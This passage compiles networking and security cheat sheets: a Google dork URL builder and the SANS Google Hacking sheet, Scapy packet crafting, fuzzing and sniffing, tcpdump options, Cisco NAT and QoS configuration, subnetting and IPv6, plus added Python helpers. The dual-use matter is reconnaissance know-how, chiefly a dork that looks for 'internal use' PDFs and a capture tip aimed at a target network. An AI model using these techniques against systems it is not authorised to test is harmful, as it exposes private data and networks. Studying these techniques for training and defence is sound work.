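        params["as_eq"] = " ".join(params["as_eq"])
    return params

def build_url(params: dict, base: str = "https://www.google.com/search") -> str:
    """URL-encode the parameter dict; empty values are dropped so the URL stays minimal."""
    return base + "?" + urlencode({k: v for k, v in params.items() if v})

def parse_url(url: str) -> dict:
    """Inverse of build_url: recover the single-valued parameters from a search URL."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}

if __name__ == "__main__":
    p = dork_to_params('site:example.com filetype:pdf -public "internal use" budget')
    print(build_url(p))
```

The round trip through parse_url is the useful check when you inherit a list of saved search URLs: it tells you which ones still carry a site restriction before you replay them.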


Google Hacking and Defense Cheat Sheet
POCKET REFERENCE GUIDE
SANS Stay Sharp Program
http://www.sans.org
http://www.sans.org/staysharp


Purpose

This document aims to be a quick reference
outlining all Google operators, their
meaning, and examples of their usage.


What to use this sheet for

Use this sheet as a handy reference that outlines the
various Google searches that you can perform. It is
meant to support you throughout the Google Hacking
and Defense course and can be used as a quick
reference guide and refresher on all Google advanced
operators used in this course. The student could also
use this sheet as guidance in building innovative
operator combinations and new search techniques.

This sheet is split into these sections:
Operator Examples
Advanced Operators
Number Searching
Calculator Operators
Search Parameters

References:
http://www.google.com/intl/en/help/refinesearch.html
http://johnny.ihackstuff.com
http://www.google.com/intl/en/help/cheatsheet.html
SCAPY


Basic Commands
ls()
List all available protocols and protocol options

lsc()
List all available scapy command functions

conf
Show/set scapy configuration parameters


Constructing Packets

# Setting protocol fields
>>> ip=IP(src="10.0.0.1")
>>> ip.dst="10.0.0.2"

# Combining layers
>>> l3=IP()/TCP()
>>> l2=Ether()/l3

# Splitting layers apart
>>> l2.getlayer(1)
<IP frag=0 proto=tcp |<TCP |>>
>>> l2.getlayer(2)
<TCP |>


Displaying Packets

# Show an entire packet
>>> (Ether()/IPv6()).show()
###[ Ethernet ]###
  dst= ff:ff:ff:ff:ff:ff
  src= 00:00:00:00:00:00
  type= 0x86dd
###[ IPv6 ]###
  version= 6
  tc= 0
  fl= 0
  plen= None
  nh= No Next Header
  hlim= 64
  src= ::1
  dst= ::1

# Show field types with default values
>>> ls(UDP())
sport  : ShortEnumField = 1025 (53)
dport  : ShortEnumField = 53 (53)
len    : ShortField     = None (None)
chksum : XShortField    = None (None)


Fuzzing

# Randomize fields where applicable
>>> fuzz(ICMP()).show()
###[ ICMP ]###
  type= <RandByte>
  code= 227
  chksum= None
  unused= <RandInt>
Specifying Addresses and Values

# Explicit IP address (use quotation marks)
>>> IP(dst="192.0.2.1")

# DNS name to be resolved at time of transmission
>>> IP(dst="example.com")

# IP network (results in a packet template)
>>> IP(dst="192.0.2.0/24")

# Random addresses with RandIP() and RandMAC()
>>> IP(dst=RandIP())
>>> Ether(dst=RandMAC())

# Set a range of numbers to be used (template)
>>> IP(ttl=(1,30))

# Random numbers with RandInt() and RandLong()
>>> IP(id=RandInt())


Sending Packets
send(pkt, inter=0, loop=0, count=1, iface=N)
Send one or more packets at layer three
sendp(pkt, inter=0, loop=0, count=1, iface=N)
Send one or more packets at layer two
sendpfast(pkt, pps=N, mbps=N, loop=0, iface=N)
Send packets much faster at layer two using tcpreplay

>>> send(IP(dst="192.0.2.1")/UDP(dport=53))
.
Sent 1 packets.
>>> sendp(Ether()/IP(dst="192.0.2.1")/UDP(dport=53))
.
Sent 1 packets.


Sending and Receiving Packets
sr(pkt, filter=N, iface=N), srp(...)
Send packets and receive replies
sr1(pkt, inter=0, loop=0, count=1, iface=N), srp1(...)
Send packets and return only the first reply
srloop(pkt, timeout=N, count=N), srploop(...)
Send packets in a loop and print each reply

>>> srloop(IP(dst="packetlife.net")/ICMP(), count=3)
RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140
RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140
RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140


Sniffing Packets
sniff(count=0, store=1, timeout=N)
Record packets off the wire; returns a list of packets when stopped

# Capture up to 100 packets (or stop with ctrl-c)
>>> pkts=sniff(count=100, iface="eth0")
>>> pkts
<Sniffed: TCP:92 UDP:7 ICMP:1 Other:0>
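The chksum= None shown by ls(UDP()) and fuzz(ICMP()) means Scapy computes the checksum when the packet is serialized for sending. As an added example (not from the cheat sheet, and deliberately written without Scapy so it runs anywhere), the following builds the same IPv4/ICMP echo request from raw bytes with the standard library, computes both checksums the way Scapy does, and verifies them again from the wire bytes, which is the check you want when a crafted packet is silently dropped. Addresses, identifier and payload are example values.

```python
"""Hand-build an IPv4/ICMP echo request the way Scapy does when chksum=None,
using only the standard library, and verify the checksums on the wire bytes."""
import struct
import socket

def inet_checksum(data: bytes) -> int:
    """RFC 1071 Internet checksum: ones'-complement sum of 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"                       # pad an odd-length message
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                        # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_icmp_echo(ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP type 8 (echo request), code 0; checksum covers the whole ICMP message."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    chksum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, chksum, ident, seq) + payload

def build_ipv4(src: str, dst: str, payload: bytes, ttl: int = 64,
               proto: int = 1, ip_id: int = 1) -> bytes:
    """Minimal 20-byte IPv4 header (no options); its checksum covers the header only."""
    ver_ihl, tos, total_len = (4 << 4) | 5, 0, 20 + len(payload)
    flags_frag = 0
    hdr = struct.pack("!BBHHHBBH4s4s", ver_ihl, tos, total_len, ip_id, flags_frag,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    hdr_cksum = inet_checksum(hdr)
    return hdr[:10] + struct.pack("!H", hdr_cksum) + hdr[12:] + payload

def verify_packet(pkt: bytes) -> dict:
    """Parse the wire bytes back and confirm both checksums; returns the decoded fields.
    A header whose checksum field is already filled in re-sums to zero."""
    ihl = (pkt[0] & 0x0F) * 4
    ip_hdr, icmp = pkt[:ihl], pkt[ihl:]
    return {
        "ip_checksum_ok": inet_checksum(ip_hdr) == 0,
        "icmp_checksum_ok": inet_checksum(icmp) == 0,
        "src": socket.inet_ntoa(ip_hdr[12:16]),
        "dst": socket.inet_ntoa(ip_hdr[16:20]),
        "proto": ip_hdr[9],
        "icmp_type": icmp[0],
        "icmp_id": struct.unpack("!H", icmp[4:6])[0],
        "icmp_seq": struct.unpack("!H", icmp[6:8])[0],
    }

if __name__ == "__main__":
    # Example values only; 10.0.0.0/8 addresses stand in for whatever you are testing.
    pkt = build_ipv4("10.0.0.1", "10.0.0.2", build_icmp_echo(0x1234, 1, b"scapy-by-hand"))
    print(verify_packet(pkt))
```

To put the bytes on the wire you would hand them to a raw socket (socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW), which needs root, exactly as Scapy's send() does.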


TCPDUMP                                                           packetlife.net

Command Line Options
-A           Print frame payload in ASCII
-c <count>   Exit after capturing count packets
-D           List available interfaces
-e           Print link-level headers
-F <file>    Use file as the filter expression
-G <n>       Rotate the dump file every n seconds
-i <iface>   Specify the capture interface
-K           Don't verify TCP checksums
-L           List data link types for the interface
-n           Don't convert addresses to names
-p           Don't capture in promiscuous mode
-q           Quick output
-r <file>    Read packets from file
-s <len>     Capture up to len bytes per packet
-S           Print absolute TCP sequence numbers
-t           Don't print timestamps
-v[v[v]]     Print more verbose output
-w <file>    Write captured packets to file
-x           Print frame payload in hex
-X           Print frame payload in hex and ASCII
-y <type>    Specify the data link type
-Z <user>    Drop privileges from root to user

On a target network use -nn (no host or port name resolution); without it the
capturing host emits its own DNS lookups for every address it sees.


Capture Filter Primitives
[src|dst] host <host>                      Matches a host as the IP source, destination, or either
ether [src|dst] host <ehost>               Matches a host as the Ethernet source, destination, or either
gateway host <host>                        Matches packets which used host as a gateway
[src|dst] net <network>/<len>              Matches packets to or from an endpoint residing in network
[tcp|udp] [src|dst] port <port>            Matches TCP or UDP packets sent to/from port
[tcp|udp] [src|dst] portrange <p1>-<p2>    Matches TCP or UDP packets to/from a port in the given range
less <length>                              Matches packets less than or equal to length
greater <length>                           Matches packets greater than or equal to length
(ether|ip|ip6) proto <protocol>            Matches an Ethernet, IPv4, or IPv6 protocol
(ether|ip) broadcast                       Matches Ethernet or IPv4 broadcasts
(ether|ip|ip6) multicast                   Matches Ethernet, IPv4, or IPv6 multicasts
type (mgt|ctl|data) [subtype <subtype>]    Matches 802.11 frames based on type and optional subtype
vlan [<vlan>]                              Matches 802.1Q frames, optionally with a VLAN ID of vlan
mpls [<label>]                             Matches MPLS packets, optionally with a label of label
<expr> <relop> <expr>                      Matches packets by an arbitrary expression


Protocols
arp  ether  fddi  icmp  ip  ip6  link  ppp  radio  rarp  slip  tcp  tr  udp  wlan

Modifiers
! or not      && or and      || or or

Examples
udp dst port not 53                  UDP not bound for port 53
host 10.0.0.1 && host 10.0.0.2       Traffic between these hosts
tcp dst port 80 or 8080              Packets to either TCP port

TCP Flags
tcp-urg  tcp-ack  tcp-psh  tcp-rst  tcp-syn  tcp-fin

ICMP Types
icmp-echoreply      icmp-routeradvert    icmp-tstampreply
icmp-unreach        icmp-routersolicit   icmp-ireq
icmp-sourcequench   icmp-timxceed        icmp-ireqreply
icmp-redirect       icmp-paramprob       icmp-maskreq
icmp-echo           icmp-tstamp          icmp-maskreply
NAT

Address Classification
Inside Local     An actual address assigned to an inside host
Inside Global    An inside address seen from the outside
Outside Global   An actual address assigned to an outside host
Outside Local    An outside address seen from the inside

Example Topology
NAT Inside -- FastEthernet0 10.0.0.1/16 [router] FastEthernet1 174.143.212.1/22 -- NAT Outside
(Inside Local / Inside Global on the left, Outside Local / Outside Global on the right)

NAT Boundary Configuration
interface FastEthernet0
 ip address 10.0.0.1 255.255.0.0
 ip nat inside
!
interface FastEthernet1
 ip address 174.143.212.1 255.255.252.0
 ip nat outside

Static Source Translation
! One line per static translation
ip nat inside source static 10.0.0.19 192.0.2.1
ip nat inside source static 10.0.1.47 192.0.2.2
ip nat outside source static 174.143.212.133 10.0.0.47
ip nat outside source static 174.143.213.240 10.0.2.181

Dynamic Source Translation
! Create an access list to match inside local addresses
access-list 10 permit 10.0.0.0 0.0.255.255
!
! Create NAT pool of inside global addresses
ip nat pool MyPool 192.0.2.1 192.0.2.254 prefix-length 24
!
! Combine them with a translation rule
ip nat inside source list 10 pool MyPool
!
! Dynamic translations can be combined with static entries
ip nat inside source static 10.0.0.42 192.0.2.42

Port Address Translation (PAT)
! Static layer four port translations
ip nat inside source static tcp 10.0.0.3 8080 192.0.2.1 80
ip nat inside source static udp 10.0.0.14 53 192.0.2.2 53
ip nat outside source static tcp 174.143.212.4 23 10.0.0.8 23
!
! Dynamic port translation with a pool
ip nat inside source list 11 pool MyPool overload
!
! Dynamic translation with interface overloading
ip nat inside source list 11 interface FastEthernet1 overload

Inside Destination Translation
! Create a rotary NAT pool
ip nat pool LoadBalServers 10.0.99.200 10.0.99.203 prefix-length 24 type rotary
!
! Enable load balancing across inside hosts for incoming traffic
ip nat inside destination list 12 pool LoadBalServers

Terminology
NAT Pool
A pool of IP addresses to be used as inside global or outside local
addresses in translations

Port Address Translation (PAT)
An extension to NAT that translates information at layer four and above,
such as TCP and UDP port numbers; dynamic PAT configurations include the
overload keyword

Extendable Translation
The extendable keyword must be appended when multiple overlapping static
translations are configured

Special NAT Pool Types
Rotary       Used for load balancing
Match-Host   Preserves the host portion of the address after translation

Troubleshooting
show ip nat translations [verbose]
clear ip nat translations
show ip nat statistics

NAT Translations Tuning
ip nat translation tcp-timeout <seconds>
ip nat translation udp-timeout <seconds>
ip nat translation max-entries <number>

QUALITY OF SERVICE : PART 1


Quality of Service Models

Best Effort
No QoS policies are implemented

Integrated Services (IntServ)
Resource Reservation Protocol (RSVP) is used to reserve bandwidth per-flow
across all nodes in a path

Differentiated Services (DiffServ)
Packets are individually classified and marked; policy decisions are made
independently by each node in a path


Layer 2 QoS Markings

Medium        Name                        Type
Ethernet      Class of Service (CoS)      3-bit 802.1p field in 802.1Q header
Frame Relay   Discard Eligibility (DE)    1-bit drop eligibility flag
ATM           Cell Loss Priority (CLP)    1-bit drop eligibility flag
MPLS          Traffic Class (TC)          3-bit field compatible with 802.1p


IP QoS Markings

IP Precedence
The first three bits of the IP TOS field; limited to 8 traffic classes

Differentiated Services Code Point (DSCP)
The first six bits of the IP TOS field are evaluated to provide more granular
classification; backward-compatible with IP Precedence


QoS Flowchart
(Diagram in the original: classified packets are placed into software queues,
and the scheduler drains the software queues into the single hardware queue.)

Terminology 


Per-Hop Behavior (PHB) 


The individual QoS action performed at each independent DiffServ node 


Trust Boundary : Beyond this, inbound QoS markings are not trusted 


Tail Drop : Occurs when a packet is dropped because a queue is full 


Policing 


Imposes an artificial ceiling on the amount of bandwidth that may be 
consumed; traffic exceeding the policer rate is reclassified or dropped 


Shaping 


Similar to policing but buffers excess traffic for delayed transmission; 
makes more efficient use of bandwidth but introduces a delay 


TCP Synchronization 


Flows adjust TCP window sizes in synch, making inefficient use of a link 


DSCP Per-Hop Behaviors 


Class Selector (CS) : Backward-compatible with IP Precedence values 


Assured Forwarding (AF) - Four classes with variable drop preferences 


Expedited Forwarding (EF) - Priority queuing for delay-sensitive traffic 
IP Type of Service (TOS)

Bits 0-2   Precedence
Bits 0-5   DSCP (the upper three DSCP bits are the Precedence bits)
Bits 6-7   ECN

Precedence/DSCP
DSCP   Binary   Name       Prec.
56     111000   Reserved   7
48     110000   Reserved   6
46     101110   EF         5
32     100000   CS4        4
34     100010   AF41       4
36     100100   AF42       4
38     100110   AF43       4
24     011000   CS3        3
26     011010   AF31       3
28     011100   AF32       3
30     011110   AF33       3
16     010000   CS2        2
18     010010   AF21       2
20     010100   AF22       2
22     010110   AF23       2
8      001000   CS1        1
10     001010   AF11       1
12     001100   AF12       1
14     001110   AF13       1
0      000000   BE         0
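The names in the table above follow from the bit layout rather than from a lookup: Class Selector values have the low three bits clear, EF is 101110, and Assured Forwarding encodes the class in the upper three bits and the drop precedence in the next two. As an added example (not from the sheet), the following decodes a TOS byte as seen in ip.tos or ipv6.class into DSCP, Precedence, PHB name and ECN, and builds the byte back from a DSCP value; the table() helper regenerates the sheet's rows from the same rules, and the only standard names it knows are those on the sheet (44, the voice-admit code point, is reported numerically).

```python
"""Decode the IPv4 TOS / IPv6 Traffic Class byte into Precedence, DSCP, PHB name and ECN,
computed from the bit layout rather than looked up."""

def split_tos(tos: int) -> dict:
    """TOS byte -> DSCP (upper 6 bits), IP Precedence (upper 3 bits), ECN (lower 2 bits)."""
    if not 0 <= tos <= 0xFF:
        raise ValueError("TOS byte must be 0..255")
    return {"dscp": tos >> 2, "precedence": tos >> 5, "ecn": tos & 0x3}

def tos_from_dscp(dscp: int, ecn: int = 0) -> int:
    """Inverse: the byte to put in ip.tos / ipv6.class for a DSCP value and ECN bits."""
    if not 0 <= dscp <= 63 or not 0 <= ecn <= 3:
        raise ValueError("dscp must be 0..63, ecn 0..3")
    return (dscp << 2) | ecn

def phb_name(dscp: int) -> str:
    """Per-hop behaviour name for a DSCP value, derived from the bit pattern:
    - xxx000            : Class Selector CSx (CS0 is Best Effort; CS6/CS7 are reserved)
    - 101110            : Expedited Forwarding (EF)
    - ccc dd 0, ccc in 1..4, dd in 1..3 : Assured Forwarding AF<ccc><dd>
    Anything else has no name on the sheet and is reported as DSCP<n>."""
    if not 0 <= dscp <= 63:
        raise ValueError("dscp must be 0..63")
    cls, low = dscp >> 3, dscp & 0x7
    if dscp == 0:
        return "BE"
    if dscp == 46:
        return "EF"
    if low == 0:
        return "Reserved" if cls >= 6 else f"CS{cls}"
    if 1 <= cls <= 4 and low in (2, 4, 6):
        return f"AF{cls}{low // 2}"          # drop precedence 1..3
    return f"DSCP{dscp}"

def describe(tos: int) -> str:
    """One-line summary such as 'tos=0xb8 dscp=46 (EF) prec=5 ecn=0'."""
    f = split_tos(tos)
    return (f"tos=0x{tos:02x} dscp={f['dscp']} ({phb_name(f['dscp'])}) "
            f"prec={f['precedence']} ecn={f['ecn']}")

def table(dscps=(56, 48, 46, 32, 34, 36, 38, 24, 26, 28, 30, 16, 18, 20, 22, 8, 10, 12, 14, 0)):
    """Regenerate the sheet's Precedence/DSCP table as (dscp, binary, name, precedence) rows."""
    return [(d, f"{d:06b}", phb_name(d), d >> 3) for d in dscps]

if __name__ == "__main__":
    for row in table():
        print("%2d  %s  %-8s %d" % row)
    print(describe(0xB8))   # voice marked EF travels as TOS 0xb8 on the wire
```

When a capture shows ip.dsfield.dscp == 46 on traffic from a workstation, split_tos tells you that it will also match any legacy policy keyed on IP Precedence 5, which is how an untrusted host can land in the priority queue if the trust boundary is misplaced.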


Congestion Avoidance 


Random Early Detection (RED) 
Packets are randomly dropped 
before a queue is full to prevent tail 
drop; mitigates TCP 
synchronization 


Weighted RED (WRED) 

RED with the added capability of 
recognizing prioritized traffic based 
on its marking 


Class-Based WRED (CBWRED) 
WRED employed inside a class- 
based WFQ (CBWFQ) queue 
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Queuing Comparison 


FIFO PQ CQ WFQ CBWFQ LLQ 

Default on Interfaces `2 Mbps NO NO <=2 Mbps No No 
Number of Queues 1 4 Configured Dynamic Configured Configured 

Configurable Classes No Yes Yes No Yes Yes 


Bandwidth Allocation Automatic Automatic Configured Automatic Configured Configured 


Provides for Minimal Delay No Yes No No No Yes 
Modern Implementation Yes No No No Yes Yes 
First In First Out (FIFO) 

[Figure: Hardware Queue; packets leave in arrival order] 

- Packets are transmitted in the order they are processed 
- No prioritization is provided 
- Default queuing method on high-speed (>2 Mbps) interfaces 
- Configurable with the tx-ring-limit interface config command 

Priority Queuing (PQ) 

[Figure: four static queues, High down to Low, feeding the hardware queue] 

- Provides four static queues which cannot be reconfigured 
- Higher-priority queues are always emptied before lower-priority queues 
- Lower-priority queues are at risk of bandwidth starvation 

Custom Queuing (CQ) 

[Figure: Queue A, Queue B, Queue C served in turn, e.g. 1500 B/cycle] 

- Rotates through queues using Weighted Round Robin (WRR) 
- Transmits a configured number of bytes from each queue per turn 
- Prevents queue starvation but does not provide for delay-sensitive traffic 

Weighted Fair Queuing (WFQ) 

[Figure: Flow 1, Flow 2 ... Flow n each get a dynamic queue feeding the hardware queue] 

- Queues are dynamically created per flow to ensure fair processing 
- Statistically drops packets from aggressive flows more often 
- No support for delay-sensitive traffic 

Class-Based WFQ (CBWFQ) 

[Figure: Queue A 512 Kbps, Queue B, Default Queue receives the remainder] 

- WFQ with administratively configured queues 
- Each queue is allocated an amount/percentage of bandwidth 
- No support for delay-sensitive traffic 

Low Latency Queuing (LLQ) 

[Figure: CBWFQ queues plus a strict-priority queue feeding the hardware queue] 

- CBWFQ with the addition of a policed strict-priority queue 
- Highly configurable while still supporting delay-sensitive traffic 

LLQ Config Example 

Class Definitions 

 ! Match packets by DSCP value 
 class-map match-all Voice 
  match dscp ef 
 class-map match-all Call-Signaling 
  match dscp cs3 
 class-map match-any Critical-Apps 
  match dscp af21 af22 
 ! Match packets by access list 
 class-map match-all Scavenger 
  match access-group name Other 

Policy Creation 

 policy-map Foo 
  class Voice 
   ! Priority queue policed to 33% 
   priority percent 33 
  class Call-Signaling 
   ! Allocate 5% of bandwidth 
   bandwidth percent 5 
  class Critical-Apps 
   bandwidth percent 20 
   ! Extend queue size to 96 packets 
   queue-limit 96 
  class Scavenger 
   ! Police to 64 kbps 
   police cir 64000 
    conform-action transmit 
    exceed-action drop 
  class class-default 
   ! Enable WFQ 
   fair-queue 
   ! Enable WRED 
   random-detect 

Policy Application 

 interface Serial0 
  ! Apply the policy in or out 
  service-policy output Foo 

Verification 

 show policy-map [interface] 
 show queue <interface> 
 show mls qos 


IPV4 SUBNETTING (packetlife.net) 

Subnets 

CIDR  Subnet Mask      Addresses      Wildcard 
/32   255.255.255.255  1              0.0.0.0 
/31   255.255.255.254  2              0.0.0.1 
/30   255.255.255.252  4              0.0.0.3 
/29   255.255.255.248  8              0.0.0.7 
/28   255.255.255.240  16             0.0.0.15 
/27   255.255.255.224  32             0.0.0.31 
/26   255.255.255.192  64             0.0.0.63 
/25   255.255.255.128  128            0.0.0.127 
/24   255.255.255.0    256            0.0.0.255 
/23   255.255.254.0    512            0.0.1.255 
/22   255.255.252.0    1,024          0.0.3.255 
/21   255.255.248.0    2,048          0.0.7.255 
/20   255.255.240.0    4,096          0.0.15.255 
/19   255.255.224.0    8,192          0.0.31.255 
/18   255.255.192.0    16,384         0.0.63.255 
/17   255.255.128.0    32,768         0.0.127.255 
/16   255.255.0.0      65,536         0.0.255.255 
/15   255.254.0.0      131,072        0.1.255.255 
/14   255.252.0.0      262,144        0.3.255.255 
/13   255.248.0.0      524,288        0.7.255.255 
/12   255.240.0.0      1,048,576      0.15.255.255 
/11   255.224.0.0      2,097,152      0.31.255.255 
/10   255.192.0.0      4,194,304      0.63.255.255 
/9    255.128.0.0      8,388,608      0.127.255.255 
/8    255.0.0.0        16,777,216     0.255.255.255 
/7    254.0.0.0        33,554,432     1.255.255.255 
/6    252.0.0.0        67,108,864     3.255.255.255 
/5    248.0.0.0        134,217,728    7.255.255.255 
/4    240.0.0.0        268,435,456    15.255.255.255 
/3    224.0.0.0        536,870,912    31.255.255.255 
/2    192.0.0.0        1,073,741,824  63.255.255.255 
/1    128.0.0.0        2,147,483,648  127.255.255.255 
/0    0.0.0.0          4,294,967,296  255.255.255.255 

Decimal to Binary 

Subnet Mask      Wildcard 
255  1111 1111   0    0000 0000 
254  1111 1110   1    0000 0001 
252  1111 1100   3    0000 0011 
248  1111 1000   7    0000 0111 
240  1111 0000   15   0000 1111 
224  1110 0000   31   0001 1111 
192  1100 0000   63   0011 1111 
128  1000 0000   127  0111 1111 
0    0000 0000   255  1111 1111 

Classful Ranges 

A  0.0.0.0 - 127.255.255.255 
B  128.0.0.0 - 191.255.255.255 
C  192.0.0.0 - 223.255.255.255 
D  224.0.0.0 - 239.255.255.255 
E  240.0.0.0 - 255.255.255.255 

Reserved Ranges 

RFC 1918   10.0.0.0 - 10.255.255.255 
RFC 1918   172.16.0.0 - 172.31.255.255 
RFC 1918   192.168.0.0 - 192.168.255.255 
Localhost  127.0.0.0 - 127.255.255.255 

Terminology 

CIDR 
Classless interdomain routing was developed to provide more granularity than legacy classful addressing; CIDR notation is expressed as /XX 

VLSM 
Variable-length subnet masks are an arbitrary length between 0 and 32 bits; CIDR relies on VLSMs to define routes 
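Added example, not from the original cheat sheet: the bit arithmetic behind the Subnets and Decimal to Binary tables, plus a classifier that reports an address's classful letter and whether it falls in an RFC 1918 or localhost range. The ipaddress module would do this in one call; the point here is to make the mask/wildcard/address-count relationship visible.

```python
# Added example (not from the cheat sheet): rebuild rows of the subnet table
# from a prefix length and classify addresses against the reserved ranges.

RESERVED = {
    "RFC 1918": ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"),
    "Localhost": ("127.0.0.0/8",),
}


def _to_int(addr: str) -> int:
    octets = [int(o) for o in addr.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"bad IPv4 address: {addr}")
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]


def _dotted(value: int) -> str:
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def _mask(prefix: int) -> int:
    if not 0 <= prefix <= 32:
        raise ValueError("prefix must be 0..32")
    return (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF  # top `prefix` bits set


def cidr_row(prefix: int) -> dict:
    """Subnet mask, wildcard (inverted mask) and address count for /prefix."""
    mask = _mask(prefix)
    return {"cidr": f"/{prefix}", "mask": _dotted(mask),
            "wildcard": _dotted(mask ^ 0xFFFFFFFF), "addresses": 1 << (32 - prefix)}


def octet_bits(value: int) -> str:
    """One mask octet written as the Decimal to Binary table does, e.g. 240 -> '1111 0000'."""
    bits = f"{value & 0xFF:08b}"
    return f"{bits[:4]} {bits[4:]}"


def in_cidr(addr: str, cidr: str) -> bool:
    """True when addr lies inside the network given in CIDR notation."""
    net, prefix = cidr.split("/")
    mask = _mask(int(prefix))
    return (_to_int(addr) & mask) == (_to_int(net) & mask)


def classify(addr: str) -> dict:
    """Classful letter from the first octet and the reserved range, if any."""
    first = _to_int(addr) >> 24
    limits = (("A", 128), ("B", 192), ("C", 224), ("D", 240), ("E", 256))
    klass = next(letter for letter, limit in limits if first < limit)
    reserved = next((name for name, nets in RESERVED.items()
                     if any(in_cidr(addr, net) for net in nets)), None)
    return {"class": klass, "reserved": reserved}
```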
IPV6 

Protocol Header 

 0          8            16           24           32 
 Version | Traffic Class |        Flow Label 
       Payload Length    | Next Header |  Hop Limit 
                    Source Address 
                  Destination Address 

Version (4 bits) - Always set to 6 
Traffic Class (8 bits) - A DSCP value for QoS 
Flow Label (20 bits) - Identifies unique flows (optional) 
Payload Length (16 bits) - Length of the payload in bytes 
Next Header (8 bits) - Header or protocol which follows 
Hop Limit (8 bits) - Similar to IPv4's time to live field 
Source Address (128 bits) - Source IP address 
Destination Address (128 bits) - Destination IP address 

Address Notation 

- Eliminate leading zeros from all two-byte sets 
- Replace up to one string of consecutive zeros with a double-colon (::) 

Address Formats 

Global unicast:     Global Prefix (48) | Subnet (16) | Interface ID (64) 
Link-local unicast: FE80::/64 (64) | Interface ID (64) 
Multicast:          FF (8) | Flags (4) | Scope (4) | Group ID (112) 

EUI-64 Formation 

MAC:    00 | 0a | 27 | 5c | 88 | 19 
EUI-64: 02 | 0a | 27 | ff | fe | 5c | 88 | 19 

- Insert 0xfffe between the two halves of the MAC 
- Flip the seventh bit (universal/local flag) to 1 

Address Types 

Unicast - One-to-one communication 
Multicast - One-to-many communication 
Anycast - An address configured in multiple locations 

Multicast Scopes 

1 Interface-local 
2 Link-local 
4 Admin-local 
5 Site-local 
8 Org-local 
E Global 

Special-Use Ranges 

::/0            Default route 
::/128          Unspecified 
::1/128         Loopback 
::/96           IPv4-compatible* 
::FFFF:0:0/96   IPv4-mapped 
2001::/32       Teredo 
2001:DB8::/32   Documentation 
2002::/16       6to4 
FC00::/7        Unique local 
FE80::/10       Link-local unicast 
FEC0::/10       Site-local unicast* 
FF00::/8        Multicast 

* Deprecated 

Extension Headers 

Hop-by-hop Options (0) - Carries additional information which must be examined by every router in the path 
Routing (43) - Provides source routing functionality 
Fragment (44) - Included when a packet has been fragmented by its source 
Encapsulating Security Payload (50) - Provides payload encryption (IPsec) 
Authentication Header (51) - Provides packet authentication (IPsec) 
Destination Options (60) - Carries additional information which pertains only to the recipient 

Dual Stack 
Transporting IPv4 and IPv6 across an infrastructure simultaneously 

Tunneling 
IPv6 traffic is encapsulated into IPv4 using IPv6-in-IP, UDP (Teredo), or Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) 

Translation 
Stateless IP/ICMP Translation (SIIT) translates IP header fields; NAT Protocol Translation (NAT-PT) maps between IPv6 and IPv4 addresses 
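Added example, not from the original cheat sheet, covering the Address Notation and EUI-64 Formation sections above: it forms a modified EUI-64 interface ID from the page's sample MAC, recovers the MAC from an interface ID built that way (how an analyst spots SLAAC addresses that embed a hardware address in logs), and compresses a full address with the two notation rules. The function names are this example's own.

```python
# Added example (not from the cheat sheet): EUI-64 formation, its inverse,
# and address compression following the two notation rules.
from typing import Optional


def mac_to_eui64(mac: str) -> str:
    """Modified EUI-64 interface ID from a MAC: insert ff:fe, invert the U/L bit."""
    octets = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(octets) != 6:
        raise ValueError("MAC address must be 48 bits")
    eui = bytearray(octets[:3] + b"\xff\xfe" + octets[3:])
    eui[0] ^= 0x02  # seventh bit of the first octet is the universal/local flag
    return ":".join(eui.hex()[i:i + 4] for i in range(0, 16, 4))


def eui64_to_mac(iid: str) -> Optional[str]:
    """MAC embedded in a modified-EUI-64 interface ID, or None if not formed that way."""
    raw = bytes.fromhex(iid.replace(":", ""))
    if len(raw) != 8 or raw[3:5] != b"\xff\xfe":
        return None
    mac = bytearray(raw[:3] + raw[5:])
    mac[0] ^= 0x02
    return ":".join(f"{b:02x}" for b in mac)


def compress(addr: str) -> str:
    """Apply the two notation rules to an address written as eight 16-bit groups."""
    groups = [g.lstrip("0") or "0" for g in addr.lower().split(":")]  # rule 1
    if len(groups) != 8:
        raise ValueError("expected eight colon-separated groups")
    best_start, best_len, i = -1, 1, 0
    while i < 8:  # rule 2: find the longest run (at least two) of zero groups
        j = i
        while j < 8 and groups[j] == "0":
            j += 1
        if j - i > best_len:
            best_start, best_len = i, j - i
        i = j + 1 if j == i else j
    if best_start < 0:
        return ":".join(groups)
    return ":".join(groups[:best_start]) + "::" + ":".join(groups[best_start + best_len:])


def link_local_from_mac(mac: str) -> str:
    """Link-local address (FE80::/64 plus EUI-64) a host autoconfigures from its MAC."""
    return compress("fe80:0000:0000:0000:" + mac_to_eui64(mac))
```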


